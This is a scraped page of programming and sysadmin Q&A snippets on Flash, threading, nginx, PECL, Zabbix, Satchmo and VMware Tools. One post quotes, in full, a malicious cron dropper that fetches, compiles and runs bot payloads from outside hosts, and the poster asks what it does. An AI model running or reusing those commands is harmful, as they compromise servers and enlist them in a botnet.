Search Results

Search found 6323 results on 253 pages for 'angularjs compile'.


  • Best practice for organizing/storing character/monster data in an RPG?

    - by eclecto
    Synopsis: Attempting to build a cross-platform RPG app in Adobe Flash Builder and am trying to figure out the best class hierarchy and the best way to store the static data used to build each of the individual "hero" and "monster" types. My programming experience, particularly in AS3, is embarrassingly small. My ultra-alpha method is to include a "_class" object in the constructor for each instance. The _class, in turn, is a static Object pulled from a class created specifically for that purpose, so things look something like this: // Character.as package { public class Character extends Sprite { public var _strength:int; // etc. public function Character(_class:Object) { _strength = _class._strength; // etc. } } } // MonsterClasses.as package { public final class MonsterClasses extends Object { public static const Monster1:Object={ _strength:50, // etc. } // etc. } } // Some other class in which characters/monsters are created. // Create a new instance of Character var myMonster = new Character(MonsterClasses.Monster1); Another option I've toyed with is the idea of making each character class/monster type its own subclass of Character, but I'm not sure if it would be efficient or even make sense considering that these classes would only be used to store variables and would add no new methods. On the other hand, it would make creating instances as simple as var myMonster = new Monster1; and potentially cut down on the overhead of having to read a class containing the data for, at a conservative preliminary estimate, over 150 monsters just to fish out the one monster I want (assuming, and I really have no idea, that such a thing might cause any kind of slowdown in execution). But long story short, I want a system that's both efficient at compile time and easy to work with during coding. Should I stick with what I've got or try a different method? As a subquestion, I'm also assuming here that the best way to store data that will be bundled with the final game and not read externally is simply to declare everything in AS3. Seems to me that if I used, say, XML or JSON I'd have to use the associated AS3 classes and methods to pull in the data, parse it, and convert it to AS3 object(s) anyway, so it would be inefficient. Right?
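    For contrast, a minimal data-driven sketch (AS3, names illustrative, not from the question) keeps every monster definition in one registry keyed by name, so nothing has to become its own subclass just to hold numbers:

      // MonsterData.as -- a hypothetical registry class, shown only as a sketch
      package {
          import flash.utils.Dictionary;

          public final class MonsterData {
              private static var defs:Dictionary = new Dictionary();

              public static function register(name:String, def:Object):void {
                  defs[name] = def;           // store the plain data object under its name
              }

              public static function lookup(name:String):Object {
                  return defs[name];          // constant-time lookup, 150 entries or 15000
              }
          }
      }

      // at startup, somewhere central:
      MonsterData.register("Monster1", { _strength: 50 /* etc. */ });

      // later:
      var myMonster:Character = new Character(MonsterData.lookup("Monster1"));

    Because the lookup is by key, the "reading 150 monsters to fish out one" worry largely goes away; whether the definitions live in an AS3 literal or in JSON parsed once at startup then becomes a build convenience rather than a performance question.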

    Read the article

  • reference list for non-IT driven algorithmic patterns

    - by Quicker
    I am looking for a reference list for non-IT driven algorithmic patterns (which still can be helped with IT implementations of IT). An Example List would be: name; short desc; reference Travelling Salesman; find the shortest possible route on a multiple target path; http://en.wikipedia.org/wiki/Travelling_salesman_problem Ressource Disposition (aka Regulation); Distribute a limited/exceeding input on a given number output receivers based on distribution rules; http://database-programmer.blogspot.de/2010/12/critical-analysis-of-algorithm-sproc.html If there is no such list, but you instantly think of something specific, please 'put it on the desk'. Maybe I can compile something out of the input I get here (actually I am very frustrated as I did not find any such list via research by myself). Details on Scoping: I found it very hard to formulate what I want in a way everything is out that I do not need (which may be the issue why I did not find anything at google). There is a database centric definition for what I am looking for in the section 'Processes' of the second example link. That somehow fits, but the database focus sort of drifts away from the pattern thinking, which I have in mind. So here are my own thoughts around what's in and what's out: I am NOT looking for a foundational algo ref list, which is implemented as basis for any programming language. Eg. the php reference describes substr and strlen. That implements algos, but is not what I am looking for. the problem the algo does address would even exist, if there were no computers (or other IT components) the main focus of the algo is NOT to help other algo's chances are high, that there are implementions of the solution or any workaround without any IT support out there in the world however the algo could be benefitialy implemented/fully supported by a software application = means: the problem of the algo has to be addressed anyway, but running an algo implementation with software automates the process (that is why I posted it on stackoverflow and not somewhere else) typically such algo implementations have more than one input field value and more than one output field value - which implies it could not be implemented as simple function (which is fixed to produce not more than one output value) in a normalized data model often times such algo implementation outputs span accross multiple rows (sometimes multiple tables), whereby the number of output rows depends on the input paraters and rows in the table(s) at start time - which implies that any algo implementation/procedure must interact with a database (read and/or write) I am mainly looking for patterns, not for specific implementations. Example: The Travelling Salesman assumes any coordinates, however it does not say: You need a table targets with fields x and y. - however sometimes descriptions are focussed on examples with specific implementations very much - no worries, as long as the pattern gets clear

    Read the article

  • Threads slowing down application and not working properly

    - by Belgin
    I'm making a software renderer which does per-polygon rasterization using a floating point digital differential analyzer algorithm. My idea was to create two threads for rasterization and have them work like so: one thread draws each even scanline in a polygon and the other thread draws each odd scanline, and they both start working at the same time, but the main application waits for both of them to finish and then pauses them before continuing with other computations. As this is the first time I'm making a threaded application, I'm not sure if the following method for thread synchronization is correct: First of all, I use two global variables to control the two threads, if a global variable is set to 1, that means the thread can start working, otherwise it must not work. This is checked by the thread running an infinite loop and if it detects that the global variable has changed its value, it does its job and then sets the variable back to 0 again. The main program also uses an empty while to check when both variables become 0 after setting them to 1. Second, each thread is assigned a global structure which contains information about the triangle that is about to be rasterized. The structures are filled in by the main program before setting the global variables to 1. My dilemma is that, while this process works under some conditions, it slows down the program considerably, and also it fails to run properly when compiled for Release in Visual Studio, or when compiled with any sort of -O optimization with gcc (i.e. nothing on screen, even SEGFAULTs). The program isn't much faster by default without threads, which you can see for yourself by commenting out the #define THREADS directive, but if I apply optimizations, it becomes much faster (especially with gcc -Ofast -march=native). N.B. It might not compile with gcc because of fscanf_s calls, but you can replace those with the usual fscanf, if you wish to use gcc. Because there is a lot of code, too much for here or pastebin, I created a git repository where you can view it. My questions are: Why does adding these two threads slow down my application? Why doesn't it work when compiling for Release or with optimizations? Can I speed up the application with threads? If so, how? Thanks in advance.
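    Spinning on plain global flags is also exactly the kind of code optimizers break: without volatile/atomic accesses or locks, the compiler is free to hoist the flag read out of the loop, which would plausibly explain the Release/-O failures. A minimal sketch (POSIX threads, not the poster's code, names illustrative) of letting the workers sleep on a condition variable instead of spinning:

      /* sketch: signal rasterizer threads with a condition variable instead of spin loops */
      #include <pthread.h>
      #include <stdbool.h>

      static pthread_mutex_t lock = PTHREAD_MUTEX_INITIALIZER;
      static pthread_cond_t  work_ready = PTHREAD_COND_INITIALIZER;
      static pthread_cond_t  work_done  = PTHREAD_COND_INITIALIZER;
      static bool pending[2];       /* one slot per rasterizer thread (even/odd scanlines) */
      static int  remaining;        /* threads still working on the current triangle       */

      static void *scanline_worker(void *arg)
      {
          int id = *(int *)arg;
          for (;;) {
              pthread_mutex_lock(&lock);
              while (!pending[id])                   /* sleep, don't spin */
                  pthread_cond_wait(&work_ready, &lock);
              pending[id] = false;
              pthread_mutex_unlock(&lock);

              /* rasterize the even or odd scanlines of the current triangle here */

              pthread_mutex_lock(&lock);
              if (--remaining == 0)
                  pthread_cond_signal(&work_done);   /* wake the main thread */
              pthread_mutex_unlock(&lock);
          }
          return NULL;
      }

      /* main thread, once per triangle */
      void rasterize_triangle(void)
      {
          pthread_mutex_lock(&lock);
          pending[0] = pending[1] = true;
          remaining = 2;
          pthread_cond_broadcast(&work_ready);
          while (remaining != 0)
              pthread_cond_wait(&work_done, &lock);  /* blocks instead of busy-waiting */
          pthread_mutex_unlock(&lock);
      }

    The Windows equivalents would be events or SleepConditionVariableCS/WaitForSingleObject; the point is the same either way: the main thread and workers stop burning cores while waiting, and the compiler can no longer optimize the handshake away.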

    Read the article

  • How to properly document functionality in an agile project?

    - by RoboShop
    So recently, we've just finished the first phase of our project. We used agile with fortnightly sprints. And whilst the application turned out well, we're now turning our eyes on some of the maintenance tasks. One maintenance task is that all of our documentation appears in the form of specs. These specs describe 1 or more stories and generally are a body of work which a few devs could knock over in a week. For development, that works really well - every two weeks, the devs get handed a spec and it's a nice discrete chunk of work that they can just do. From a documentation point of view, this has become a mess. The problem with writing specs that are focused on delivering just-in-time requirements to developers is we haven't placed much emphasis on the big picture. Specs come from all different angles - it could be describing a standard function, it could describing parts of a workflow, it could be describing a particular screen... And now, we have business rules about our application scattered across 120 documents. Looking for any document for a particular business rule or function in particular is quite hard because you don't know which document has this information, and making a change request is equally hard because once again, we are unsure about which spec to make the change. So we have maybe a couple of weeks of lull before it's back to specing out functionality for the next phase but in this time, I'd like to re-visit our processes. I think the way we have worked so far in terms of delivering fortnightly specs works well. But we also need a way to manage our documentation so that our business rules for a given function / workflow are easy to locate / change. I have two ideas. One is we compile all of our specs into a series of master specs broken by a few broad functional areas. The specs describe the sprint, the master spec describe the system. The only problem I can see is 1) Our existing 120 specs are not all neatly defined into broad functional areas. Some will require breaking up, merging etc. which will take a lot of time. 2) We'll be writing specs and updating master specs in each new sprint. Seems like double the work, and then do the devs look at the spec or the master spec? My other suggestion is to concede that our documentation is too big of a mess, and manage that mess going forward. So we go through each spec, assign like keywords to it, and then when we want to search for a function, we search for that keyword. Problems I can see 1) Still the problem of business rules scattered everywhere, keywords just make it easier to find it. anyway, if anyone has any decent ideas or any experience to share about how best to manage documentation, would really appreciate it.

    Read the article

  • Unable to install SQL 2008 on Windows 7

    - by Axel
    SQL 2008 install hangs on Windows 7 The story: Trying to install SQL2008 on Windows 7 hangs on SqlEngineDBStartconfigAction_install_configrc_Cpu32. What I Tried: Uninstall hangs on validation Manual uninstall using msiinv.exe and msiexec /x works Added SQL service accounts to local admins no help Turn of UAC no help Last lines in setup log: 2010-04-01 16:18:05 SQLEngine: : Checking Engine checkpoint 'GetSqlServerProcessHandle' 2010-04-01 16:18:05 SQLEngine: --SqlServerServiceSCM: Waiting for nt event 'Global\sqlserverRecComplete' to be created 2010-04-01 16:18:07 SQLEngine: --SqlServerServiceSCM: Waiting for nt event 'Global\sqlserverRecComplete' or sql process handle to be signaled 2010-04-01 16:18:07 SQLEngine: : Checking Engine checkpoint 'WaitSqlServerStartEvents' 2010-04-01 16:18:53 Slp: Sco: Attempting to initialize script 2010-04-01 16:18:53 Slp: Sco: Attempting to initialize default connection string 2010-04-01 16:18:53 Slp: Sco: Attempting to set script connection protocol to NotSpecified 2010-04-01 16:18:53 Slp: Sco: Attempting to set script connection protocol to NamedPipes 2010-04-01 16:18:53 SQLEngine: --SqlDatabaseServiceConfig: Connection String: Data Source=\\.\pipe\SQLLocal\MSSQLSERVER;Initial Catalog=master;Integrated Security=True;Pooling=False;Network Library=dbnmpntw;Application Name=SqlSetup 2010-04-01 16:18:53 SQLEngine: : Checking Engine checkpoint 'ServiceConfigConnect' 2010-04-01 16:18:53 SQLEngine: --SqlDatabaseServiceConfig: Connecting to SQL.... 2010-04-01 16:18:53 Slp: Sco: Attempting to connect script 2010-04-01 16:18:53 Slp: Connection string: Data Source=\\.\pipe\SQLLocal\MSSQLSERVER;Initial Catalog=master;Integrated Security=True;Pooling=False;Network Library=dbnmpntw;Application Name=SqlSetup And now comes the fun part: When I open conf mgr I can see the service running, I enabled named pipes and TCP/IP, restarted the service I'm able to connect to the server using an OLE DB connection but not with the Native Client. And what I find suspicious is the following error in my app log: .NET Runtime Optimization Service (clr_optimization_v2.0.50727_32) - Failed to compile: C:\Program Files\Microsoft SQL Server\100\Tools\Binn\VSShell\Common7\Tools\VDT\DataProjects.dll . Error code = 0x8007000b In MS connect this is reported as a bug but MS is unable to reproduce the problem altough when you search the fora I'm not the only one with this problem. So any help is appreciated.

    Read the article

  • Is SecureShellz bot a virus? How does it work?

    - by ProGNOMmers
    I'm using a development server on which I found this in the crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd [...] The contents of http://stablehost.us/bots/regular.bot are: #!/bin/sh if [ $(whoami) = "root" ]; then echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1 wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2 exit 1 fi wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_ I cannot contact the sysadmin for various reasons, so I cannot ask him about it. It seems to me that this script downloads some remote C source code and binaries, compiles them and executes them. I am a web developer, not a C expert, but looking at the downloaded files it appears to be a bot injected into the server's cron. Can you give me more information about what this code does, how it works, and what its purpose is?
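    It certainly looks like a dropper: every week it refreshes the loader, which in turn fetches Perl and C payloads (the perl-libwww / IO-Socket-SSL installs are for the Perl bots, gcc for the C one), hides them under names like /lib/xpath.so.* or .php*, and runs them. A cautious first look at how far it got, based only on the paths visible in that cron entry (standard commands; verify before deleting anything):

      crontab -l                                      # confirm whose crontab carries the entries
      ls -la /dev/shm/tmp/ /lib/xpath.so* 2>/dev/null # files dropped when run as root
      ls -la .php .phpa .php_ 2>/dev/null             # files dropped when run as a normal user
      ps aux | egrep '\.rnd|xpath\.so|\.php'          # are any of the payloads still running?
      crontab -e                                      # remove the two lines, then kill the processes

    Once a machine has executed unknown binaries fetched this way (possibly as root), the only safe end state is a rebuild plus credential rotation, so treat the commands above as evidence gathering rather than cleanup.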

    Read the article

  • How config nginx to serve flv video streaming with JWplayer

    - by Nisanio
    I need to serve flv files from one server and show those videos on a web page located on another server, with JWPlayer. I already configured nginx with the flv module and put this in nginx.conf: location ~ \.flv$ { flv; } The code I use for the JWPlayer is <object id="player" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" name="player" width="328" height="200"> <param name="movie" value="player.swf" /> <param name="allowfullscreen" value="true" /> <param name="allowscriptaccess" value="always" /> <param name="flashvars" value="file=http://XX.XX.XX.XX/vid5.flv&image=preview2.jpg" /> <embed type="application/x-shockwave-flash" id="player2" name="player2" src="player.swf" width="630" height="385" allowscriptaccess="always" allowfullscreen="true" flashvars="file=http://XX.XX.XX.XX/vid5.flv&image=preview2.jpg" /> </object> Where XX.XX.XX.XX is the IP address of the server (we'll configure an appropriate domain later, but first I have to make the whole thing work :) ). The problem is that nothing happens. I don't know what to do next; all the articles on the internet only talk about how to compile the flv module (already done) and add the nginx.conf lines. Any help would be greatly appreciated. Thanks in advance
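    Two things are commonly missing in this setup: the flv location has no root (so nginx has nothing to serve from), and because the player SWF sits on a different host, Flash asks the video server for /crossdomain.xml before it will load the stream. A sketch, assuming the files live in /var/www/videos (path is illustrative):

      server {
          listen       80;
          server_name  XX.XX.XX.XX;
          root         /var/www/videos;      # vid5.flv goes here

          location ~ \.flv$ {
              flv;                           # enables ?start= pseudo-streaming for these files
          }

          location = /crossdomain.xml {
              # serve a permissive crossdomain policy so the JWPlayer SWF on the other host may load the video
          }
      }

    With that in place, first test http://XX.XX.XX.XX/vid5.flv directly in a browser; if nginx can't serve it there, JWPlayer never will.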

    Read the article

  • Pecl compiles .so extensions for the OS X built-in PHP and not MAMP

    - by Camsoft
    I've installed the sphinx binaries and libraries and am now trying to install the PECL sphinx module. My system is running OS X 10.6 with MAMP 1.8.2 installed. I try to install sphinx using the following command: sudo pecl install sphinx The PECL command outputs the following: running: phpize Configuring for: PHP Api Version: 20090626 Zend Module Api No: 20090626 Zend Extension Api No: 220090626 The versions above don't match the versions listed when doing a phpinfo(). It seems that PECL is trying to compile against the built-in version of PHP. If I ignore the errors and continue, it will successfully compile and place the sphinx.so file in: /usr/lib/php/extensions/no-debug-non-zts-20090626/sphinx.so when in fact it should be: /Applications/MAMP/bin/php5/lib/php/extensions/no-debug-non-zts-20060613/ I've tried copying the sphinx.so file to the MAMP extensions dir but when I restart Apache, PHP displays the following warning: PHP Startup: Unable to load dynamic library '/Applications/MAMP/bin/php5/lib/php/extensions/no-debug-non-zts-20060613/sphinx.so I think this is because MAMP is 32-bit and the built-in PHP is 64-bit, so PECL compiles for 64-bit. I might be completely wrong, but I did read this when I googled the topic. Does anyone know how to get PECL to build against the MAMP version of PHP instead of the built-in version?
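    The usual way around this is not to let pecl pick the phpize at all, but to build the extension by hand against MAMP's own PHP. A sketch, assuming MAMP's tree is /Applications/MAMP/bin/php5 and that it ships phpize/php-config (older MAMP releases need the matching PHP source dropped in first):

      pecl download sphinx
      tar xzf sphinx-*.tgz && cd sphinx-*/
      /Applications/MAMP/bin/php5/bin/phpize
      ./configure --with-php-config=/Applications/MAMP/bin/php5/bin/php-config \
                  CFLAGS="-arch i386" CXXFLAGS="-arch i386"    # MAMP 1.x runs 32-bit
      make && make install    # lands in MAMP's .../extensions/no-debug-non-zts-20060613/

    Using MAMP's php-config is what makes both the API version (20060613) and the architecture come out right, so no manual copying of the .so should be needed afterwards.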

    Read the article

  • Zabbix Proxy not collecting data

    - by Jordan Eunson
    I have a working Zabbix 1.8.2 server collecting data for our office and our colo facility. However the link between the colo and office is flaky. What I'm trying to do is setup a proxy on the colo side to have a 1 hour cache and relay the data to our primary server at the office. Our zabbix server is compiled from source and uses a mysql database I've followed the instructions found in the zabbix documentation to compile the proxy using a sqlite3 database. I add the proxy to zabbix under Administration-DM-Proxies. The zabbix server "sees" the proxy because the "last seen" field is always under 60s. However when I assign a colo host to the proxy I stop receiving data from it. The colo host's zabbix_agentd.log file says this: 29343:20100622:124847 Timeout while answering request 29343:20100622:124847 Getting list of active checks failed. Will retry after 60 seconds The zabbix_proxy.log says this. 2041:20100622:123131.760 Deleted 0 records from history [0.000994 seconds] 2028:20100622:124131.671 Error while receiving answer from server [ZBX_TCP_READ() failed I also am unable to receive any SNMP data which is more important to me than the zabbix agent data. Has anyone had this problem before? Zabbix Server OS: CentOS5.4 Zabbix Server Build: 1.8.2 from source Zabbix Proxy OS: CentOS5.4 Zabbix Proxy Build: 1.8.2 from source P.S. The SQLite database on the zabbix proxy never gets any data written to it, it is identical to when I created it from the blank schema in zabbix-1.8.2/create/schema. (Yes I've checked the permissions)
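    One thing worth double-checking: once a host is moved behind a proxy, its agent has to talk to the proxy rather than the office server, and the proxy's Hostname has to match the name entered under Administration -> DM -> Proxies exactly. A sketch of the relevant zabbix_proxy.conf lines (values are examples, not your setup):

      Server=office-zabbix.example.com   # the 1.8.2 server the proxy forwards collected data to
      Hostname=colo-proxy                # must equal the proxy name configured in the frontend
      DBName=/var/lib/zabbix/zabbix_proxy.db
      ConfigFrequency=300                # how often host/item configuration is pulled from the server
      ProxyOfflineBuffer=1               # hours of data kept locally while the office link is down

    On each colo host, Server= in zabbix_agentd.conf should then point at the proxy; "Getting list of active checks failed" is typically what an agent prints when it is still asking the old server for checks that are now owned by the proxy, and the same redirection applies to where the SNMP items are polled from.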

    Read the article

  • mysql-python on Snow Leopard with MySQL 64-bit

    - by Derek Reynolds
    Can't seem to get mysql-python to work on Snow Leopard for the life of me. Currently using the default version of python that ships with Snow Leopard (python 2.6.1). Installed MySQL 5.1.45 x86_64. I download the source for mysql-python http://sourceforge.net/projects/mysql-python/ and compile with the following commands: tar xzf MySQL-python-1.2.3c1.tar.gz cd MySQL-python-1.2.3c1 ARCHFLAGS='-arch x86_64' python setup.py build ARCHFLAGS='-arch x86_64' python setup.py install And am getting the following error when I try to import: Python 2.6.1 (r261:67515, Jul 7 2009, 23:51:51) [GCC 4.2.1 (Apple Inc. build 5646)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> import MySQLdb Traceback (most recent call last): File "<stdin>", line 1, in <module> File "build/bdist.macosx-10.6-universal/egg/MySQLdb/__init__.py", line 19, in <module> File "build/bdist.macosx-10.6-universal/egg/_mysql.py", line 7, in <module> File "build/bdist.macosx-10.6-universal/egg/_mysql.py", line 6, in __bootstrap__ ImportError: dlopen(/Users/derek/.python-eggs/MySQL_python-1.2.3c1-py2.6-macosx-10.6-universal.egg-tmp/_mysql.so, 2): no suitable image found. Did find: /Users/derek/.python-eggs/MySQL_python-1.2.3c1-py2.6-macosx-10.6-universal.egg-tmp/_mysql.so: mach-o, but wrong architecture Any ideas? Or the best route for starting over.
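    "mach-o, but wrong architecture" means the _mysql.so that got built does not match either the Python or the libmysqlclient it is loaded against, so the quick thing is to check who is what and rebuild from a clean slate (standard commands; paths assume the stock MySQL 5.1 .pkg layout):

      file /usr/local/mysql/lib/libmysqlclient*.dylib    # should report x86_64
      python -c "import platform; print platform.architecture()"
      # wipe the half-built egg and its extracted copy before rebuilding
      rm -rf build ~/.python-eggs/MySQL_python*
      ARCHFLAGS='-arch x86_64' python setup.py build
      sudo ARCHFLAGS='-arch x86_64' python setup.py install

    If the build log still shows -arch i386 or -arch ppc sneaking in, those flags are probably coming from mysql_config --cflags, and trimming them out of the build configuration (site.cfg / setup_posix.py in the MySQL-python source) is the next place to look.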

    Read the article

  • To install Markdown's extensions by Python

    - by Masi
    The installation notes (git://gitorious.org/python-markdown/mainline.git) say in the file using_as_module.txt One of the parameters that you can pass is a list of Extensions. Extensions must be available as python modules either within the markdown.extensions package or on your PYTHONPATH with names starting with mdx_, followed by the name of the extension. Thus, extensions=['footnotes'] will first look for the module markdown.extensions.footnotes, then a module named mdx_footnotes. See the documentation specific to the extension you are using for help in specifying configuration settings for that extension. I put the folder "extensions" into ~/bin/python/ so that my PYTHONPATH is the following: export PYTHONPATH=/Users/masi/bin/python/:/opt/local/Library/Frameworks/Python.framework/Versions/2.6/ The instructions say that I need to import the addons like this: import markdown import <module-name> However, I cannot see any such module in my Python. This suggests to me that the extensions are not available as "python modules - - on [my] PYTHONPATH with names starting with mdx_ - -." How can I get Markdown's extensions to work? 2nd attempt: at ~/bin/markdown I run git clone git://gitorious.org/python-markdown/mainline.git python-markdown cd python-markdown python setup.py install I added the folder /Users/masi/bin/markdown/python-markdown/build to my PATH because the installation message suggests that is the new location of the extensions. I have the following in a test markdown document: [TOC] -- headings here with # -format --- However, I do not get the table of contents. This suggests to me that we need to somehow activate the extensions when compiling with the markdown.py script. The problem comes back to my first quoted text, which is rather confusing to me.
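    The extension names are not modules you import yourself; they are strings handed to markdown, which then resolves markdown.extensions.<name> or mdx_<name> for you. A short sketch against a normally installed python-markdown (2.x-era API):

      import markdown

      text = open("notes.md").read()
      html = markdown.markdown(text, extensions=["toc", "footnotes"])  # "toc" handles the [TOC] marker
      print html

    If python -c "import markdown; print markdown.__file__" points into the git build/ directory rather than site-packages, the setup.py install did not land where the interpreter looks, and that is worth fixing before blaming the extensions themselves.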

    Read the article

  • Error in CentOS 6 while compiling Java classes in Tomcat 6

    - by AJIT RANA
    I am a newbie to Linux and CentOS 6. I just bought a server and want to deploy my web app on it. I am getting an error while compiling my servlet classes: bash: javac: command not found. But when I looked in '/usr/lib/jvm/java-1.6.0/bin' I found javac there. When I then ran it directly with ./javac I got an error: [root:ip_address.com]# ./javac There is insufficient memory for the Java Runtime Environment to continue. pthread_getattr_np Error occurred during initialization of VM java.lang.OutOfMemoryError: unable to create new native thread I followed the steps shown in "Java outofmemoryerror when creating <100 threads", which gives the command to check the limits: [root:ipaddress.com]# ulimit -a core file size (blocks, -c) unlimited data seg size (kbytes, -d) unlimited scheduling priority (-e) 0 file size (blocks, -f) unlimited pending signals (-i) 278528 max locked memory (kbytes, -l) 32 max memory size (kbytes, -m) unlimited open files (-n) 1024 pipe size (512 bytes, -p) 8 POSIX message queues (bytes, -q) 819200 real-time priority (-r) 0 stack size (kbytes, -s) 10240 cpu time (seconds, -t) unlimited max user processes (-u) 1024 virtual memory (kbytes, -v) unlimited file locks (-x) unlimited [root:ipaddress.com]# top bash: top: command not found Link: http://stackoverflow.com/q/12913857/1746764
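    The ulimit output is the real hint: 1024 max user processes and a 10 MB stack on a small VPS is easily too tight for the JVM's default thread stacks. Two hedged things to try before compiling again:

      ulimit -u 4096                      # allow more native threads for this shell, if the VPS permits it
      javac -J-Xmx64m -J-Xss512k *.java   # -J passes options straight to the JVM that runs javac itself

    On container-style VPSes (OpenVZ and similar) the real ceiling is often set by the host, in which case only the provider can raise it, and no amount of local ulimit tweaking will help.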

    Read the article

  • Problems during an update of cPanel / WHM

    - by haron
    I ordered a Master WHM account with the CentOS / cPanel combination (whm-cpanel.eu.pn). The install was old enough that an update of the basic services was necessary (it had: WHM 11.15.0, cPanel 11.17.0, WHM X v3.1.0, Apache 1.3.37, PHP 4.4.7, MySQL 4.1.22). 1/ I started by updating cPanel / WHM with the command /scripts/upcp. Everything went well until, in the middle of the install, the server stopped responding (no ping, no ssh). The installation appears to have continued on its own to the end, and after some time everything was back to normal (I do not know whether there was a reboot) and my interface was updated (cPanel 11.24.4-R36167 - WHM 11.24.2 - X 3.9). 2/ Then I updated MySQL via the tweak setting for it in WHM, followed by the command /scripts/mysqlup. Everything went fine there, no problem. 3/ Finally, I wanted to upgrade to Apache 2.2 / PHP 5, so I used /scripts/easyapache. After selecting all the packages and modules the installation started, but the same thing happened as in point 1: the server stopped responding, and this time the installation did not go through. Apache 2.2 did make it in (after a second try) but PHP stayed at 4. I tried the same operation several times without success. I do not think it is a memory problem; free -m shortly before losing contact showed nothing alarming. On the other hand, CPU time did seem to climb. I reinstalled the machine and tried again: same problem! Whether via the WHM interface or from the shell, the installation stops short; for 15 minutes the machine does not respond, then everything returns to normal, but PHP is never updated. Is there a known bug in this version of cPanel / WHM? Has anyone run into the same problem? And if I compile Apache / PHP manually, without using the easyapache script, will I run into problems with cPanel later? Thank you!

    Read the article

  • How can I install Satchmo?

    - by Jonathan Hayward
    I am trying to install Satchmo 0.9 on an Ubuntu 9.10 guest off of the instructions at http://bitbucket.org/chris1610/satchmo/downloads/Satchmo.pdf. I run into difficulties at 2.1.2: pip install -r http://bitbucket.org/chris1610/satchmo/raw/tip/scripts/requirements.txt pip install -e hg+http://bitbucket.org/chris1610/satchmo/@v0.9#egg=satchmo The first command fails because a compile error for how it's trying to build PIL. So I ran an "aptitude install python-imaging", locally copy the first line's requirements.text, and remove the line that's unsuccessfully trying to build PIL. The first line completes without error, as does the second. The next step tells me to change directory to the /path/to/new/store, and run: python clonesatchmo.py A little bit of trouble here; I am told that clonesatchmo.py will be in /bin by now, and it isn't there, but I put some Satchmo stuff under /usr/local, create a symlink in /bin, and run: python /bin/clonesatchmo.py This gives: jonathan@ubuntu:~/store$ python /bin/clonesatchmo.py Creating the Satchmo Application Traceback (most recent call last): File "/bin/clonesatchmo.py", line 108, in <module> create_satchmo_site(opts.site_name) File "/bin/clonesatchmo.py", line 47, in create_satchmo_site import satchmo_skeleton ImportError: No module named satchmo_skeleton A find after apparently checking out the repository reveals that there is no file with a name like satchmo*skeleton* on my system. I thought that bash might be prone to take part of the second pip invocation's URL as the beginning of a comment; I tried both: pip install -e hg+http://bitbucket.org/chris1610/satchmo/@v0.9\#egg=satchmo pip install -e hg+http://bitbucket.org/chris1610/satchmo/@v0.9#egg=satchmo Neither way of doing it seems to take care of the import error mentioned above. How can I get a Satchmo installation under Ubuntu, or at least enough of a Satchmo installation that I am able to start with a skeleton of a store and then flesh it out the way I want? Thanks, Jonathan

    Read the article

  • Where to get glib-config for Kubuntu?

    - by Carl Smotricz
    I'm trying to compile Midnight Commander on a KUbuntu 9.10 (Karmic) box with no root access. I've set up a directory under $HOME, downloaded the mc source package and various stuff required for building, such as autotools. I've unpacked the CONTENTS of all those packages into this working directory such that I have the usual ./usr, ./lib, ./etc hierarchy. I manage to get configure through a lot of tests, but I can't seem to fool it into finding glib. checking for glib-2.0... checking for glib-config... no checking for glib12-config... no checking for glib-config... no checking for GLIB - version >= 1.2.6... no *** The glib-config script installed by GLIB could not be found *** If GLIB was installed in PREFIX, make sure PREFIX/bin is in *** your path, or set the GLIB_CONFIG environment variable to the *** full path to glib-config. configure: error: Test for glib failed. GNU Midnight Commander requires glib 1.2.6 or above. My system has glib installed: /lib/libglib-2.0.so.0 /lib/libglib-2.0.so.0.2200.3 ... and I've also downloaded and unpacked the glib package into my working directory: libglib2.0-0_2.22.2-0ubuntu1_i386.deb libglib2.0-dev_2.22.2-0ubuntu1_i386.deb ... but still the elusive glib-config is nowhere to be found. It's not in any debian package for Karmic, either. So I'd appreciate any help getting over this hurdle. Please note, again, that I don't have root, so I can't just merrily apt-get stuff.

    Read the article

  • How to install VMware tools for Ubuntu 11.04 hosted on VMware ESXi?

    - by Dmitri Toubelis
    I'm running Vmware ESX 4.1 and I have a development VM that I recently upgraded from Ubuntu 10.04 to 11.04. Then I tried to re-install VMware Tools and some of the modules gave me an error and would not compile. As a result I'm having problems with backing up this virtual machine now and I suspect VMware tools is the reason. I installed latest patches for VMware host, that included an update to VMware Tools (v8.3.7 build-381511) but I'm still getting the same error. The error I'm getting is like this: ... /tmp/vmware-root/modules/vmhgfs-only/super.c:73:4: error: unknown field 'clear_inode' specified in initializer make[2]: *** [/tmp/vmware-root/modules/vmhgfs-only/super.o] Error 1 make[1]: *** [_module_/tmp/vmware-root/modules/vmhgfs-only] Error 2 make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-8-generic' make: *** [vmhgfs.ko] Error 2 make: Leaving directory `/tmp/vmware-root/modules/vmhgfs-only' and also this: /tmp/vmware-root/modules/vmci-only/vmci_drv.c:91:4: error: unknown field 'ioctl' specified in initializer /tmp/vmware-root/modules/vmci-only/vmci_drv.c:91:4: warning: initialization from incompatible pointer type /tmp/vmware-root/modules/vmci-only/vmci_drv.c: In function 'vmci_init': /tmp/vmware-root/modules/vmci-only/vmci_drv.c:151:4: error: implicit declaration of function 'init_MUTEX' make[2]: *** [/tmp/vmware-root/modules/vmci-only/vmci_drv.o] Error 1 make[1]: *** [_module_/tmp/vmware-root/modules/vmci-only] Error 2 make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-8-generic' make: *** [vmci.ko] Error 2 make: 